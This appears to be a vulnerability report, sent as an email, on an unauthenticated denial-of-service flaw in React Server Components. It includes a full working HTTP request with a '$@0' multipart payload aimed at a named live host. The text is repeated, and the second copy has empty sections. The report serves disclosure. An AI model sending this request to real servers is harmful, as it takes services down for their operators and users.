Hello,
React Server Components 19.0.0 to 19.2.1 including react-server-dom-parcel, react-server-dom-turbopack, and react-server-dom-webpack contain an insecure deserialization vulnerability caused by unsafe payload deserialization in Server Function endpoints, letting unauthenticated attackers cause denial of service by hanging the server process with a single HTTP request.
Steps to reproduce:
- Please send the following request:
POST / HTTP/1.1
Host: yoki.astar.network
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Next-Action: x
Content-Type: multipart/form-data; boundary=---------------------------735323031399963166993862150
Content-Length: 151
-----------------------------735323031399963166993862150
Content-Disposition: form-data; name="0"
"$@0"
-----------------------------735323031399963166993862150--
Proof of concept:
Remediation:
- Update to the latest version that fixes the unsafe deserialization issue.
Reference:
Impact
Unauthenticated attackers can cause denial of service by hanging the server process with a single HTTP request.
Thanks and have a good day!
Hello,
React Server Components 19.0.0 to 19.2.1 including react-server-dom-parcel, react-server-dom-turbopack, and react-server-dom-webpack contain an insecure deserialization vulnerability caused by unsafe payload deserialization in Server Function endpoints, letting unauthenticated attackers cause denial of service by hanging the server process with a single HTTP request.
Steps to reproduce:
Proof of concept:
Remediation:
Reference:
Impact
Unauthenticated attackers can cause denial of service by hanging the server process with a single HTTP request.
Thanks and have a good day!